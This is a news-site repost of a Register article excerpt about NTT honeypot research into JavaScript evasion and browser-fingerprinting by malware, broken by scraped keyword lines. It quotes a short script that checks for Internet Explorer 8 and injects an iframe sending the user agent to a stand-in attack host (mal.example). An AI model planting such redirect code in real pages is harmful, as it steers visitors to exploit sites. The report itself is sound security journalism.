How evil JavaScript helps attackers tag possible victims – and gives away their intent

www.theregister.co.uk | 8/9/2018 | Staff
smnth28 (Posted by) Level 3
Click For Photo: https://regmedia.co.uk/2018/08/09/shuttertsock_kick_me.jpg?x=1200&y=794

A honeypot project operated by Japanese comms company NTT has turned up a bunch of new approaches to malware obfuscation.

Yuta Takata of NTT's Secure Platform Laboratories has published an analysis at the Asia Pacific Network Information Centre (APNIC) here. In it, he wrote that since JavaScript can be used to identify different (and vulnerable) browsers, it's worth watching to see if malware authors are using it that way.

Takata - Group - Evasion - Techniques - Abuse

Takata's group identified five evasion techniques that all abuse differences between JavaScript implementations, he stated, which is more complex than familiar redirection attacks that look at the User-Agent and redirect victims to pages specific to their browser.

In other words, this code would redirect an Internet Explorer 8 user to an attack site, but leave others alone:

Var - = - Navigator - UserAgent

var ua = navigator.userAgent;

if(ua.indexOf(“MSIE 8”) > -1) {

Var - Ifr - = - Document - CreateElement

var ifr = document.createElement("iframe");

ifr.setAttribute("src", “http://mal.example/ua=”+ ua);

Document - Body

document.body.appendChild(ifr);

It...
(Excerpt) Read more at: www.theregister.co.uk
Wake Up To Breaking News!
Do I know who I am?
Sign In or Register to comment.

Welcome to Long Room!

Where The World Finds Its News!